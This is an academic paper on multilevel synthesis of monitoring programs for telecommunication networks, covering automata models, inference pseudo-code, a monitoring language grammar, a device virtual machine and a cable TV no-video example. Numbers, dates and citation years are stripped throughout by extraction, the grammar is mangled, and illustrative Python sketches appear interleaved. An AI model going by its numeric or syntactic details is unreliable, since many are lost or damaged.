today monitoring systems are used in almost all subject areas: medical (baig et al., ; mukhopadhyay, ; sohn et al., ; yang et al., ; shichkina et al., ), environment (gaikwad & mistry, ; kumar, kim & hancke, ), social networks (chakravarthi, tiwari & handa, ), energy (eissa, elmesalawy & hadhoud, ), production (singh, gernaey & gani, ), urban, economy (bello et al., ; sakhardande, hanagal & kulkarni, ), agriculture (suma et al., ), transport (shichkina et al., ), fishery (raju & varma, ), etc. for many subject areas, including telecommunication, monitoring systems play a critical role. in traditional monitoring systems (zabbix, http://www.zabbix.com/), (nagios, http://www.nagios.org/), (zenoss, http://www.zenoss.org/), (pandora fms, https://pandorafms.com/), (icinga, https://icinga.com/), (sensu, http://sensu.io/), (groundwork monitor, https://www.gwos.com/), data is collected and then transmitted to monitoring systems in the form of data streams. the data is processed by monitoring systems which have a distributed tree structure. each element can collect and process data from multiple objects. the higher-level elements aggregate the data processing results of the lower-level elements. the tree structure allows the monitoring systems to have a sufficiently high level of performance. if the observed objects or the generated data change, redesign of the monitoring systems becomes necessary. system redesign assumes active involvement of software architects and programmers. in the past few years, monitoring systems have evolved significantly. the developed monitoring systems are based on the integration of multiple modern technologies (morgan & o'donnell, ). in particular, in these systems, data is collected using internet of things technologies (maksymyuk et al., ; myint, gopal & aung, ; raju & varma, ; sakhardande, hanagal & kulkarni, ; suma et al., ; yang et al., ). data processing employs statistical methods, data mining algorithms, and machine learning algorithms (ge, song & gao, ). these monitoring systems are a type of adaptive system. they assume changes in both data gathering processes and data processing processes. adaptive systems use flexible data processing models (cabal-yepez et al., ; dovžan, logar & Škrjanc, ) or business rules (al mamun et al., ; koetter & kochanowski, ) to build and rebuild processes. their ability to adapt in different cases depends on the composition of the selected business rules and the defined values of the customizable parameters of the processing models (singh, gernaey & gani, ). reconfigurable monitoring systems have advanced capabilities for adaptive data gathering and processing. the features of reconfigurable systems are discussed in (korableva, kalimullina & kurbanova, ; lyke et al., ). in monitoring systems, reconfiguration operations can be considered at several levels: the sensor level, the embedded system level, and the application level. at the sensor level, reconfiguration problems are solved by developing new programmable sensors (myint, gopal & aung, ); new programs are uploaded to update the logic of the sensors. for the adaptation of embedded monitoring systems, they are equipped with reconfigurable data preprocessing modules (cabal-yepez et al., ).
at the application level, adaptability is achieved through customizable interfaces (fu, ), the use of genetic algorithms (thompson, ), and so on. it is also possible to synthesize new configurations for the systems and their components at the level of field-programmable gate arrays (cong et al., ; cong & minkovich, ; lysecky, vahid & tan, ; rubin & dehon, ). for implementing reconfigurable systems, several methods have been proposed. in (morgan & o'donell, ), service-oriented architectures of reconfigurable systems are presented, and the problems of message routing and service orchestration in such systems are discussed. technological solutions for building reconfigurable systems are given in (silva, marques & lopes, ). one of the limitations of the existing systems is that they cannot reconfigure themselves dynamically. for dynamic reconfiguration, they have to be able to synthesize programs for data gathering and data processing and execute them. some of the processes should be performed in the monitoring systems and some on the end-user devices. to date, only a few dynamically reconfigurable systems exist. one such system has been developed for monitoring the status and performance of a supercomputer network (stefanov et al., ). the monitoring system is considered as a set of subsystems. the subsystems process data about the performance of one or more tasks. performance metrics are calculated on the fly. to this purpose, a program module is dynamically created for each process that is performed to solve the general task, and the transmission paths for the calculated metrics are dynamically determined. the module-oriented architecture of the systems and their ability to create modules dynamically make them able to adapt to new data sources and new processing methods. when a new module is created, the nodes on which it will be executed are selected based on the current load on the computer network. as a result, a balanced load of the nodes is ensured. the nodes of the system can process a part of the data about the state of the network. with this, additional resources for solving the monitoring problems are obtained. the results of using these monitoring systems have shown that they allow solving the tasks of monitoring supercomputer networks. reconfigurable systems and dynamically reconfigurable systems have not yet been developed in the field of telecommunications.

multilevel synthesis of monitoring programs

monitoring objects, processes, and programs in telecommunication networks

telecommunication networks have a multilevel structure. the elements of the higher levels are groups of objects. within the lower levels, separate objects are considered. these objects are end-user devices. they are characterized by their components and subcomponents. there are multiple links between the elements at all levels. monitoring processes are oriented toward providing data about the state of the end-users' devices to the customer service. these devices can gather data about their state and process it. monitoring systems can interact with the devices. within the interaction, data can be received from the devices, and commands on data gathering and data processing can be sent to them.
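purely as an illustration of the multilevel view described above, the monitored objects can be held in a nested structure of parameter sets; the python sketch below uses names we chose ourselves and is not part of the authors' system.

```python
from dataclasses import dataclass, field
from typing import Dict, List

@dataclass
class Element:
    """A component or subcomponent of an end-user device, described by parameters."""
    name: str
    parameters: Dict[str, float] = field(default_factory=dict)
    subelements: List["Element"] = field(default_factory=list)

@dataclass
class MonitoredObject:
    """An end-user device: a lower-level element of the multilevel network model."""
    device_id: str
    elements: List[Element] = field(default_factory=list)

@dataclass
class ObjectGroup:
    """A higher-level element: a group of monitored devices."""
    name: str
    members: List[MonitoredObject] = field(default_factory=list)
```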
the devices can perceive both separate commands and programs that contain multiple commands. monitoring programs are built and rebuilt by monitoring systems. new programs are built in multiple cases, such as changes in the structure, state, or behavior of the devices or the definition of new requirements for the results of the monitoring. requirements can refer both to the output data about the state of the network and to the conditions of the monitoring, for example, admissible modeling time, accuracy and reliability of the models, consumed technical resources, etc. there are two primary sources of data about the state of the devices: the messages that are sent from the devices and the log files that they produce. the log files are sequences of records that describe events registered by the devices. related data on factors affecting the network operation can be received from other sources. the operators of the customer service define the requirements for the results of the monitoring.

figure . the structure of the monitoring process.

figure represents the structure of the monitoring process. according to the figure, monitoring processes assume gathering data about the target objects (end-user devices). current models of the target objects are built using the gathered data. these models reflect the state of the objects based on the available data. the current models are compared with the required models, which are defined according to the requirements of the end-users (operators of customer service). usually, these two models do not match. current models can have many undefined parameters in comparison with the required models. if the models do not match, then new monitoring programs are synthesized. possible ways of transitions between the current and the required models are considered to synthesize new programs. each transition determines additional elements of data that are needed to reach the target model. thus, after constructing sequences of transitions, it becomes known what data should be gathered. new monitoring programs contain sequences of commands that allow gathering the required data elements. formally, the monitoring process pr can be defined as pr: o′ → o′′, where o′ is the model that reflects the state of the objects in the network. the model o′ is the current model that is built using the gathered data. the model o′′ is the model that is required by the user. the monitoring processes are targeted at building current models that match the required models. the synthesis of monitoring programs is an essential part of the monitoring processes. synthesized programs are defined as the complement of o′′ with respect to o′: prg = o′′ \ o′ = {e ∈ o′′ | e ∉ o′}. the synthesis of the monitoring programs is ensured through the following:
• the networks are commonly described in discrete time and discrete space. thus automata are used as the models of the networks. automata describe the states of the networks. since there are too many possible states and some of them can be unknown, it is not possible to describe all the states of the automata a priori. due to that, relatively finite
• traditional methods of synthesis have high computational complexity. the complexity can be reduced if we take into account the multilevel structure of the networks. to synthesize models of objects with a multilevel structure, multilevel methods of synthesis can be used. compared to single-level methods, they allow the speed of the synthesis of the required programs to be increased several times. this is achieved because the number of elements in the models at the upper levels is small in relation to the lower levels.
• the synthesized programs can be described using a new language. it is oriented towards describing programs for the monitoring of telecommunication networks. the programs that are written using this language can be compiled and executed on end-user devices.

automata models for program synthesis

the models of the objects are multilevel structures that represent the objects as multiple sets of parameters. sets of parameters and separate parameters are linked within separate levels and between the levels. we suggest using multilevel automata models to synthesize the monitoring programs for objects that assume gathering information at different levels. the model of the automata at one level can be defined in the following way (osipov, ; osipov et al., ): <ai, ao, as, ar>, where ai is a set of admissible input data, ao is a set of admissible output data, as is a set of admissible internal states, and ar is an admissible set of transition functions between the elements of the set of input data and the elements of the set of output data. so, the entire multilevel model is <<ai^1, ao^1, as^1, ar^1>; <ai^2, ao^2, as^2, ar^2>; ...; <ai^n, ao^n, as^n, ar^n>>, where the superscript defines the level of the automata model. at each step of program synthesis, the automata can be in one of the admissible states. within each step, the sets of admissible states and transition functions are rebuilt, taking into account the achieved state and the conditions of synthesis. thus the automaton at step r is defined as <i_r, o_r, s_r, f_r, ai_{r−1}, ao_{r−1}, as_{r−1}, ar_{r−1}>, where i is the input data, o the output data, s the internal state, and f the transition functions (conditions). the parameters i, o, s, f are defined for the step r, and the parameters ai, ao, as, ar for the step r−1.

method of synthesis of monitoring programs

the method allows synthesizing programs for object monitoring in conditions when the current and the target models of the objects are defined. it is required to gather the data about the objects that are necessary to move from the current models towards the required models. the method uses direct and backward inference. the direct inference is used to prove that the transition between models is possible and that the target model exists. as a result of the direct proof, multiple sequences of transitions can be defined. the backward inference allows restoring programs from the results of the proof; the inference is carried out according to a scheme that mirrors the direct inference. when the existence of the target models cannot be proved, the possibility of changing the models can be considered. in the automata model for program synthesis, the set of input data elements {ds} is defined according to the current model of the object, and the set of output data elements {dw} consists of elements of the target model of the object.
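the following python sketch shows one possible in-memory representation of the per-level automaton model <ai, ao, as, ar> and of its step-wise redefinition. the field names and the trivial rebuilding rule are assumptions made for illustration only; the transition functions (ar) are the links that the synthesis method described next works with.

from dataclasses import dataclass

# illustrative representation of one level of the automata model <ai, ao, as, ar>
@dataclass
class levelautomaton:
    admissible_inputs: set       # ai
    admissible_outputs: set      # ao
    admissible_states: set       # as
    transition_functions: list   # ar: functions linking input elements to output elements

# the multilevel model is an ordered collection of level automata,
# the first entry corresponding to the lowest level and the last to level n
multilevel_model = [
    levelautomaton(set(), set(), set(), []),
    levelautomaton(set(), set(), set(), []),
]

def rebuild_for_step(model, achieved_state, synthesis_conditions):
    # placeholder for the per-step redefinition: the admissible sets and transition
    # functions are rebuilt from the achieved state and the conditions of synthesis;
    # the real rebuilding rules are domain-specific and not spelled out here
    for level in model:
        level.admissible_states = level.admissible_states | {achieved_state}
    return model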
transition functions fzv reflect links between elements of the models: fzv(dzve) -> (dzva), where e = [1, ez] indicates the elements of the models that are required to achieve the element indicated as dzva.

method for building sequences of transitions between object models based on direct inference

below the description of the method is given.
input data: {ds} - the sets of the input data elements; {dw} - the sets of the output data elements; fzv - the transition functions between the elements.
output data: transitionsequence - sequences of transitions that allow reaching the elements {dw} of the target model having the elements {ds} of the current model.
the pseudo-code of the method is the following:

function findachievableelements(maxlevel, m, currentm, targetm) is
    for each l in [maxlevel..1] do
        for each i in [1..m.funconditions[l].length] do
            if checkcondition(m.funconditions[l][i]) == true do
                elementpairs = cartesianproduct(currentm.elements[l], targetm.elements[l])
                for each j in [1..elementpairs.length]
                    if proftransition(m.vzlinkingfun[l][i](elementpairs[j].first, elementpairs[j].second)) == true do
                        m.achievedfrom[l] = add(m.achievedfrom[l], elementpairs[j].first)
                        m.achievedto[l] = add(m.achievedto[l], elementpairs[j].second)
                        m.achievedwith[l] = add(m.achievedwith[l], m.vzlinkingfun[l][i])
                        m.achievedwhile[l] = add(m.achievedwhile[l], checkcondition[l][i])
                        remove(m.nonproven[l+1], elementpairs[j].second)
                    else
                        m.nonproven[l] = add(m.nonproven[l], elementpairs[j].second)
        end
    if m.nonproven[l].length != 0 && maxlevel != 1 do
        findachievableelements(maxlevel-1, m, currentm, targetm)
    end
    return m

function directprogramsynthesis(maxlevel, m, currentm, targetm) is
    m = findachievableelements(maxlevel, m, currentm, targetm)
    if m.nonproven.length == 0 do
        for each l in [1..maxlevel] do
            m.transitionsequence = zip(zip(m.achievedwith[l], m.achievedwhile[l]), zip(m.achievedfrom[l], m.achievedto[l]))
            /* to get a list of quads of the form (function, condition, input, output) */
    else
        error 'no transition is found'
    return m

method for restoring programs from the results of the proof based on backward inference

below the description of the method is given.
input data: {dw} - the sets of the input data elements; {ds} - the sets of the output data elements. the target data elements are considered as the input, and the input data elements as the target elements, because the inference is backward.
output data: prg - models of monitoring programs.
the pseudo-code of the method is the following:

function backwrdprogramsynthesis(maxlevel, m, currentm, targetm) is
    prg = initializeprogram
    mproc = initializeprogrammodel
    /* build the model of the monitoring program using backward inference; targetm and currentm are swapped */
    mproc = directprogramsynthesis(maxlevel, mproc, targetm, currentm)
    mprog = reproducetransitionsequences(mproc)
    /* build the model of the monitoring program according to the synthesized structure */
    for each l in [(maxlevel-1)..1] do
        for each i in [1..mproc.achievedwith[l].length] do
            z = getfunkind(mproc.achievedwith[l][i])
            v = getfuntype(mproc.achievedwith[l][i])
            mprog.structureelements[l] = add(mprog.structureelements[l], buildstructureelement(z, v))
        end
        for each i in [1..mproc.achievedwhile[l].length] do
            conditions = mproc.achievedwhile[l][i]
            mprog.condition[l] = add(mprog.condition[l], buildconditions(conditions))
        end
        mprog.program[l] = buildprogramforlevel(mprog.structureelements[l], mprog.condition[l])
        /* transform the program structure elements of each level to the resulting program structure */
        prg = buildprogram(prg, mprog.program[l])
    end
    return prg

the resulting program is a sequence of program structure elements that can be converted to program code written using scripting languages.

complexity of multilevel synthesis of monitoring programs

the upper boundary of the time th required for program synthesis using the proposed method can be estimated by the following formula:

th ≈ c·∑_{i=1..k} m_i² ≤ c·(∑_{i=1..k} m_i)²,

where c is a constant coefficient and m_i is the number of conditions on the i-th level. it is necessary to mention that m_i is essentially less than the total number of the conditions of the automata model. taking into account that on the upper levels each inference step is equivalent to n_i steps at the level "1", one can get a lower boundary of the time tl of the multilevel synthesis of the programs:

tl ≈ c·∑_{i=1..k} (m_i²/n_i) ≤ c·∑_{i=1..k} m_i².

the average estimate of the time t of the multilevel synthesis with respect to these two boundaries is equal to t = (tl + th)/2.

implementation of monitoring programs

language for monitoring programs

we design the language to describe programs for the monitoring of telecommunication networks. the programs are intended for execution on end-user devices. the following requirements were imposed on the capabilities of the language: it should allow configurable filtering and data aggregation parameters, determine the composition of messages sent from the devices, specify commands for performing actions by the devices, and determine the conditions for their execution. a vocabulary and a syntax are defined for the modeling language. the vocabulary is presented in the table below; the syntax is given as follows.

table: vocabulary of the modeling language.
symbol - description
space, tab, \n, \r - separator
// or /* */ - comment
[a-za-z_][0-9a-za-z_]* - identifier
".." (with escapes \n, \r, \t, \xnn, \\, \") - literal string
{} - block of code

program =: 'module' id ';' (global_var_definition | function_definition)* <end of file>
global_var_definition =: id(name) '=' expression ';'
function_definition =: id(name) '(' (id(param_name) (',' id(param_name))*)? ')' '{' (statement)* '}'
statement =: expression ';'
    | id(local_var) '=' expression ';'
    | 'if' '(' expression ')' statement ('else' statement)?
    | (id(label) ':')? 'while' '(' expression ')' statement
    | (id(label) ':')? 'do' statement 'while' '(' expression ')' ';'
    | (id(label) ':')? 'for' '(' initializer_list ';' expression ';' (expression (',' expression)*)? ')' statement
    | '{' (statement)* '}'
    | 'break;'
    | 'return' expression ';'
expression =: ternary
ternary =: concatenation ('?' ternary ':' ternary)?
concatenation =: logical ('_' logical)*
logical =: comparison (('&&' | '||') comparison)*
comparison =: math (('<' | '<=' | '>' | '>=' | '==' | '!=') math)?
math =:muls ((‘+’ | ‘-’ muls)* muls =:unary ((‘*’ | ‘/’ | ‘%’ | ’*’ | ‘&’ | ‘|’ | ‘< < ’ | ‘> > ’) unary)* unary =:unary_head unary_tail unary_head=:numeric_const | string_literal | id(var_name) | (‘-’ | ‘∼’ | ‘!’ | ‘++’ | ‘–’) unary_head | ‘(’ expression ‘)’ | ‘[’ id(field_name) (‘,’ id(field_name))* ‘]’ ((‘*’ muls) / (‘{’ expression (‘,’ expression)* ‘}’))? ’ unary_tail=:‘[’ expression (‘:’ expression)? )‘]’ | (‘:=’ | ‘+=’ | ‘-=’ | ‘/=’ | ‘_=’ ....) expression | ‘(’ expression (‘,’ expression)* ‘)’ | ‘.’ id(field_name) | ‘++’ | ‘–’ the source codes of the programs are encoded in utf . the modeling language is a typed language. types are not converted to each other automatically. each expression has a type known at the compilation stage. types have no names. the same types are those that have the same constructors and the same sets of parameters. the language supports the following data types: int ( bits with a sign), bool (false | true), string (characters in utf- , addressed byte by byte), table (an array of variable size, containing structures with fields), link to a function, array of variable size. variables in the language are set in the form: ‘‘name = initializer’’. the type of initializer simultaneously sets the type of the variable. it is forbidden to declare an uninitialized tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. variable. variables starting with ‘‘_’’ are reserved for platform variable names (for example, _currenttime). a variable that has not been modified in the program code are considered as constant when compiled. global variables are initialized before the function that starts the program is called. they are initialized in the order of their declaration in the program. it is possible to access global variables before declaring them. if during the initialization of global variables functions are called, then in these functions, global variables that are not yet initialized cannot be used. changes in variables (assignment) is performed by a group of operators + =, & = b, etc. to assign a new value to a variable, the operator:: = is used. local variables are defined in context from the declaration point to the end of the block in which they are declared. local variables declared in the header of the for loop are defined in this header and the loop body. declaring two identical variables in the same context is not allowed. also, overriding (hiding) an external context variable is not allowed. the language provides the following control structures: block of operators, declaration of a local variable, expression, condition, loop, exit from the loop, exit from the function, and return value. the functions in the proposed modeling language are described in the form: ‘name (parameters) {actions}’. nested local functions are not supported, as this leads to the need to work with closures and increases the complexity of the program. the result of the return expression determines the type of result. the types of parameters are determined by the actual parameters passed in the first function call. the types of parameters in all calls must match because using polymorphism or instantiating templates can lead to an increase in the size of the generated code and to increase the time of program execution. functions can be called before they are declared. functions can be called directly, assigned to variables, passed as parameters, and returned as results. 
when working with strings, the following operations can be performed: assigning a literal constant, concatenation, obtaining the length of a string, converting a string to a number, converting a number to a string, receiving a substring, comparing strings, parsing a string and patterns, searching for a string in a table, parsing parameters. the following options are provided for working with the tables: create a table, create a table with initialization, access fields, get the number of records, insert records, delete records, search in the table by a numeric key, search in the table by a string key. when working with arrays, it is possible to create them, create with initialization, access elements, get the size, insert elements, delete elements, search for an element. the data is encoded by the int data type and corresponds to unix time. further extension of the developed language is possible, in particular, support of program interfaces, class structures, inheritance mechanisms. program models for monitoring the program is translated into a binary format. the translation is provided through a developed compiler. as a result of the translation, a program module is formed. during tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the conversion, the compiler checks the syntax of the program text, the consistency of the names, and the compatibility of the type. when describing a program in binary format, instructions in the general command language are used, which makes it possible to extend the developed language. instructions are strictly typed that allows high-speed program execution. the compactness of the binary programs is ensured by using language structures that are close to the solved monitoring tasks and by the compactness of the structures themselves. monitoring programs are intended for execution by the virtual machines. loading and unloading modules, their registration and calls assumed to be carried out through the software interface, which is provided by the machines: int vm_load_module (void* data); // data should be allocated with vm_alloc void vm_free_module (int id); size_t vm_lookup (char* fn_name); void vm_call (size_t ord, char* params); void *vm_alloc (size_t size); modules cannot call each other’s functions or exchange information. when the module is loaded, the start () function that registers the named event handlers is executed. the predefined handlers are the following: ‘‘t’’ –a timer handler that is called once a second in the idle mode; ‘‘c’’ –a handler that is called in response to a console command; ‘‘s’’ –a handler that is called, before sending any packet, allows adding the necessary fields and events to the packet. parameters are passed to the handlers as text strings with separators ‘‘|’’. in the language, the operators that allow extract parameters from the strings of this format are supported. // if called myhandler(‘‘ |hello’’); myhandler(p) { screen = intarg(); // screen = mode = strarg(); // mode = ‘‘hello’’; ... } the loadable modules have access to the sets of system variables, parameters provided by system functions. they can initiate actions that can be performed by the system functions. 
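the module interface above is a c api; the short python sketch below only simulates the handler registration and the '|'-separated parameter passing described in this section, with invented handler and event names, and is not the virtual machine's actual implementation.

# illustrative python simulation of the handler mechanism; not the real c interface
handlers = {}

def register(event_name, handler):
    # analogous to the registration performed in a module's start() function
    handlers[event_name] = handler

def dispatch(event_name, params):
    # parameters are passed to handlers as text strings with '|' separators
    if event_name in handlers:
        handlers[event_name](params.split("|"))

# hypothetical console-command handler (the "c" event)
def on_console(args):
    screen = int(args[0])
    mode = args[1]
    print("console command:", screen, mode)

register("c", on_console)
dispatch("c", "1|hello")   # prints: console command: 1 hello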
timerproc(s) { if (_systemmemfree < * ) reboot(); } when executing code in a virtual machine, the following verification procedures are performed: availability of free memory, stack overflow error, looping, index out of array bounds error, accessing uninitialized fields, division by zero, getting the remainder of division by zero. when an exception occurs, the module is unloaded, and its resources are freed, then its handler stops perceiving information about external events. tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. a virtual machine for monitoring the synthesized monitoring programs are executed by the virtual machine (vm) [ ], whose structure is shown in fig. . the main elements of the virtual machine are the following: cn (computer network) agent - an application running on a network element and containing a virtual machine (cn vm) in which program modules are executed; cn vm (virtual machine) –the environment for the program modules execution; cm vm prodmodule - an agent which logic is determined by the synthesized programs that are loaded on the elements of the networks; logger –an element of the network that is responsible for collecting and providing log files produced by the elements of the networks. the logic of using the virtual machine is as follows. program modules are compiled for each of the synthesized programs. the modules are placed on the data provider. when new modules appear, they are loaded into the vm. to load the modules, dts is used. vm ensures the execution of the modules. the logic of data gathering and data processing that is defined by the loaded program modules can be executed once, in the loop, or on the event. the gathered data is recorded during the execution of the module by the logger. the collected data is transmitted to the monitoring system. there is a possibility for messages exchanging between the vm and the monitoring system. the cn listener provides it. the monitoring system can manage the virtual machine using the command manager. discussion the proposed method for program synthesis can be used for a number of real-life applications. the cable tv network monitoring system is taken as a typical example of a telecommunication network. a common cable tv network contains one or more servers that serve tv receivers of the end-users. the receivers provide users a variety of services for watching tv. the task of the monitoring systems is to identify the errors that occur on the devices of the end-users, to localize them, and find their causes. monitoring systems are deployed on the servers, and the virtual machines are installed on tv receivers. program modules for monitoring are synthesized on the servers and are executed by the virtual machines. the software of the tv receivers has a multi-level structure. the software of the upper levels provides the logic of the user’s services. on the low levels, the interaction with technical means is implemented. the number and composition of the intermediate levels depend on the type of receivers. the intermediate levels can include a level of the primary functions and a transport level. the state of each user service is characterized by several parameters related to different levels of the software structure. there are links between the parameters of different levels. 
the primary user services include image display services (video), services of individual delivery of television programs and films to subscribers (vod (video on demand, vod), services for viewing private live broadcasts (ppv (pay per view, ppv) and others. to the tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure monitoring virtual machine structure. full-size doi: . /peerjcs. /fig- essential services refer electronic program guide service (epg), service for writing data to disk (dvr), authorization service (authorization), service for switching between channels (chanelsw), etc. transport level services allow receive/transmit data to external systems. these services receive data from the tuner (tuning service), decode incoming data streams (decoding service). an error in the operation of any service results in malfunctioning of one or several end-user services. regular monitoring assumes control of the parameters that characterize the state of the end-user services, including video, vod, and ppv services. these parameters are no_video, no_vod, no_ppv. they take the value ’true’ when errors occur in the working of these services. if one of the parameters takes the value ’true’, a message is formed on the tv receiver and transmitted to the monitoring system. after receiving one such message, the monitoring system synthesizes a new monitoring program for collecting data necessary to localize the error and identify its cause. the synthesized program is compiled and loaded on the receiver that has sent the message. a model of the process of regular monitoring of a user service is presented in fig. . the monitoring process may be in one of the following states: initial state s and final state s , processing of a parameter s , service is fully functional s , service is malfunctioning s , sending an error message about service failure s . the values of the controlled parameters determine transitions between the states. if an error occurs, the newly synthesized programs provide a collection of additional parameters related to services provided by the software of the lower levels. in this case, the process model has a structure that is shown in fig. . the following states are defined in the model: initial state s , final state s , collection of an extended set of parameters s , processing of an extended set of parameters s , service is fully functional s , service is tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure model of the regular monitoring process. full-size doi: . /peerjcs. /fig- figure model of the monitoring process in case an error occurs in the work of a service. full-size doi: . /peerjcs. /fig- malfunctioning s , sending an error message about the service failure s , sending collected additional parameters s . consider the situation when there is no image on the user’s screen, i.e., no_video error has occurred. other upper-level services, in particular, vod and ppv, are operating normally. thus, the initial state of the users’ device is described by the following vector of the parameters {no_video, vod, ppv}, the output vector is defined as {video}. the output vector corresponds to the state of the device when there is an image on the screen. fig. shows the scheme of the synthesis that allows reaching the state {video} from the state {no_video, vod, ppv}. 
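as a rough illustration of this example, the python sketch below walks an assumed set of links between services to find which lower-level states are still unknown and therefore must be gathered before the state {video} can be proved reachable. the link structure is invented for illustration and is not the exact structure used in the described system.

# illustrative sketch of the no_video example; the dependency links are assumed
depends_on = {
    "video": ["dvr", "epg", "decoding", "authorization", "chanelsw", "tuning"],
    "decoding": ["tuning"],
}
# services whose state is already known to be fully functional
working = {"vod", "ppv", "dvr", "epg", "decoding", "authorization", "chanelsw"}

def unknown_dependencies(service):
    # collect the dependencies whose state is not yet known and must be gathered
    unknown, seen = [], set()
    stack = list(depends_on.get(service, []))
    while stack:
        s = stack.pop()
        if s in seen:
            continue
        seen.add(s)
        if s not in working:
            unknown.append(s)
        stack.extend(depends_on.get(s, []))
    return unknown

# only the tuner's state remains unknown, so the synthesized program
# gathers the parameters of the tuning service
print(unknown_dependencies("video"))   # ['tuning']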
the synthesis is carried out in two directions - direct and reverse. within the direct synthesis, the possibilities of transition from {no_video, vod, ppv} to {video} are considered. if such possibilities exist, then reverse synthesis allows building programs of monitoring on the base of identified possibilities. figure shows the services of various levels and links between them. the descriptions of the software structure determine the links between the services. the solid line indicates known links that exist. the dotted lines show the links that should exist when the video service is fully functional. according to the fig. , the result of the direct synthesis is the vector {dvr, epg, decoding, authorization, chanelsw}. the state of the tuning service is unknown, but it is required to identify the possibility of reaching the state {video}. using the reverse tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure the scheme of the synthesis of the monitoring programs to identify the cause of no image on users tv screens. full-size doi: . /peerjcs. /fig- synthesis, the sequence {video} -> {tuning} -> {no_video} is constructed. following this sequence, it is necessary to check the tuner’s function of data receiving. a dozen parameters characterize the status of the tuner function of data received. the types of tuners determine them. the synthesized monitoring program contains commands for collecting the required set of parameters. below fragments of synthesized programs are presented. the following program is used for regular monitoring of the state of the video service: module main; // event code assignment no_video_event = < event_code> ; start(){ // event registration register(‘‘dc:novideo()’’,novideo); } sendalertnovideo(){ alerttime = _currenttime; { reportint(no_video_event); reportint(alerttime); return true; } return false; } tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the program below provides the collection of additional parameters that allow find the causes of no image on the users’ screens: module main; start(){ // standard initialization procedures ... //gathering required parameters reportint(vm_ia_firsttunerparam); reportint(vm_ia_secondtunerparam); ... reportint(vm_ia_ntunerparam); // standard termination procedures ... } conclusion in the article, the multilevel synthesis of programs for telecommunication networks monitoring is discussed. a new method for monitoring dynamic networks with a multilevel structure is proposed. a new language for describing monitoring programs has been developed. the programs are translated into binary code using a compiler. the compiled programs can be executed in monitoring systems and on end-user devices. for this, a new virtual machine that is installed on the elements of the network has been designed and implemented. the value of the proposed multilevel synthesis is that it offers the possibility to build reconfigurable monitoring systems for telecommunication networks. the proposed method can be used for telecommunication networks monitoring in a wide range of subject domains. further development of the ideas of multilevel synthesis of monitoring programs assumes its application for a wide range of subject domains. 
additional information and declarations funding the paper was prepared in saint–petersburg electrotechnical university (leti), and is supported by the agreement no - - - dated . . (ministry of science and higher education of the russian federation, in accordance with the decree of the government of the russian federation of april , no. ), project "creation of a domestic high-tech production of vehicle security systems based on a control mechanism and intelligent sensors, including millimeter radars in the - ghz range". the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: ministry of science and higher education of the russian federation: - - - . competing interests andrey kalmatskiy and natalia alexandrovna zhukova were employees of zodiac systems, russia & usa. andrey kalmatskiy is currently an employee of google, usa. author contributions • man tianxing conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • vasiliy yurievich osipov, alexander ivanovich vodyaho and andrey kalmatskiy conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • natalia alexandrovna zhukova performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • sergey vyacheslavovich lebedev performed the experiments, performed the computation work, prepared figures and/or tables, and approved the final draft. • yulia alexandrovna shichkina analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available at github: https://github.com/karol /lispy. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references al mamun ma, hannan m, hussain a, basri h. . theoretical model and implementation of a real time intelligent bin status monitoring system using rule based decision algorithms. expert systems with applications : – doi . /j.eswa. . . . baig mm, gholamhosseini h, moqeem aa, mirza f, lindén m. . a sys- tematic review of wearable patient monitoring systems–current challenges and opportunities for clinical adoption. journal of medical systems ( ): doi . /s - - - . bello jp, silva c, nov o, dubois rl, arora a, salamon j, mydlarz c, doraiswamy h. . sonyc: a system for the monitoring, analysis and mitigation of urban noise pollution. arxiv preprint. arxiv: . tianxing et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/karol /lispy http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://arxiv.org/abs/ http://dx.doi.org/ . /peerj-cs. cabal-yepez e, garcia-ramirez ag, romero-troncoso rj, garcia-perez a, osornio- rios ra. . reconfigurable monitoring system for time-frequency analysis on industrial equipment through stft and dwt. ieee transactions on industrial informatics : – doi . /tii. . . 
